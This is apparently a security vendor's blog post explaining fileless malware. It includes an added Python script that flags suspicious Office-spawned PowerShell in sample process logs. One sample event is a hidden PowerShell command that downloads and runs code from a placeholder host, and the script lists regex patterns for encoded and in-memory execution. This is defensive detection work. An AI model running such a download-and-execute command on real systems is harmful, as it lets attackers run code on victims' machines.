Fileless Malware—Is It Any Worse than Traditional Attack Vectors?
Companies are already having a hard enough time protecting their networks and identifying breaches. With average time to detect at nearly 100 days and 200 days for financial services firms and retailers, respectively, it’s clear that security professionals have their hands full.
And yet, cyber attackers continue to up their games as they find new ways to compromise your network. If you’re relying on old antivirus software, you might not be able to keep up.
One emerging attack vector is fileless malware—but what is it and is it worse than typical malware?
Fileless Malware Is Pretty Much What It Sounds Like
It may seem obvious, but fileless malware is just that—malware that doesn’t copy any files to your system to execute. Instead, payloads are injected directly into the memory of running processes and the malware executes in your RAM.
This is particularly problematic because your typical antivirus software relies on the files that malware places on your hard drive. Rather than being able to analyze the hard drive and quarantine/remove malicious files, fileless malware adds a new layer of stealth for attackers because it executes directly in memory and leaves nothing on disk to scan.
However, the defining features of fileless malware don’t have to be so strict. That is, these kinds of attacks could potentially look like the phishing/spam campaigns that we’ve all grown so used to.
In an example from earlier this year, attackers launched a spam campaign that delivered malicious Word documents that executed macros when opened, delivering fileless malware in the process. In cases like this, fileless refers to the fact that attackers leverage Windows PowerShell to load an executable file directly into memory rather than writing it to the disk (where it can be detected by average malware scanners).
Here are three types of malware that can leverage fileless capabilities to improve the ability to avoid detection:
- Memory-resident malware: By using the memory space of a real Windows file, attackers can load malicious code that lies dormant until activated. The fileless aspect is that the malware can’t be detected by standard file-scanning antivirus software.
- Rootkits: Because rootkits live in the kernel rather than in a file, they have powerful abilities to avoid detection. They aren’t 100% fileless, but fit into this category as it evolves.
- Windows Registry malware: Like in the example mentioned above, these attacks take advantage of the Windows Registry database that stores low-level settings for various applications. The malware relies on code executed through a file, but this file is set to self-destruct after execution, allowing the malware to persist as fileless.
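As an added example that is not part of the original post, the following Python script shows the kind of detection logic a defender would run over process-creation telemetry to catch the Office-macro-to-PowerShell chain described above and the in-memory loading traits in the list. The events are constructed to look like Sysmon Event ID 1 records; the indicator patterns, the Office parent list and the two-indicator threshold are assumptions made for this example, not rules from any product.

```python
import re

# Constructed sample events shaped like Sysmon Event ID 1 (process creation); invented, not captured telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -NoP -W Hidden -EncodedCommand <base64-placeholder>"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "cmd.exe /c powershell -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/x')\""},
]

# Office applications that should not normally be launching a shell (assumed list).
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line traits of PowerShell executing code from memory rather than a script on disk.
# Each is an indicator, not proof; triage() below requires more than one to fire.
INDICATORS = {
    "encoded_command": re.compile(r"-(e|ec|en|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(in|indowstyle)?\s+hidden", re.I),
    "download_cradle": re.compile(r"\bIEX\b|Invoke-Expression|DownloadString|DownloadData", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly|VirtualAlloc", re.I),
}

def score_event(event):
    """Return the names of the indicators triggered by one process-creation event."""
    hits = []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    if parent in OFFICE_PARENTS and "powershell" in cmd.lower():
        hits.append("office_spawned_powershell")
    for name, pattern in INDICATORS.items():
        if pattern.search(cmd):
            hits.append(name)
    return hits

def triage(events, min_hits=2):
    """Return (index, hits) pairs for events that trip at least min_hits indicators."""
    flagged = []
    for i, event in enumerate(events):
        hits = score_event(event)
        if len(hits) >= min_hits:
            flagged.append((i, hits))
    return flagged
```

Running `triage(SAMPLE_EVENTS)` flags the two Office-spawned shells and leaves the scheduled backup script alone, which is the point of requiring a combination of traits rather than a single keyword.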
Fileless Malware Points to a Greater Cybersecurity Problem
The real implications of fileless malware are apparent on the forensics side of the attack equation. Because they don’t write to disk, forensics experts will have a much more difficult time reconstructing attacks from these kinds of malware.
Signature-based solutions could still work for fileless malware, but you have to be aware of the bigger picture problem that these emerging vectors point to. Rather than modifying aging systems and solutions to possibly address fileless malware, we need to realize that advanced attacks and ransomware threats could soon incorporate fileless characteristics (if they haven’t already).
Rather than hoping your employees will be vigilant against any suspicious emails or keep their machines 100% patched, invest in the next generation of endpoint protection and get ahead of the fileless malware problem. Download our free Next Generation Endpoint Protection Buyer’s Guide to learn more.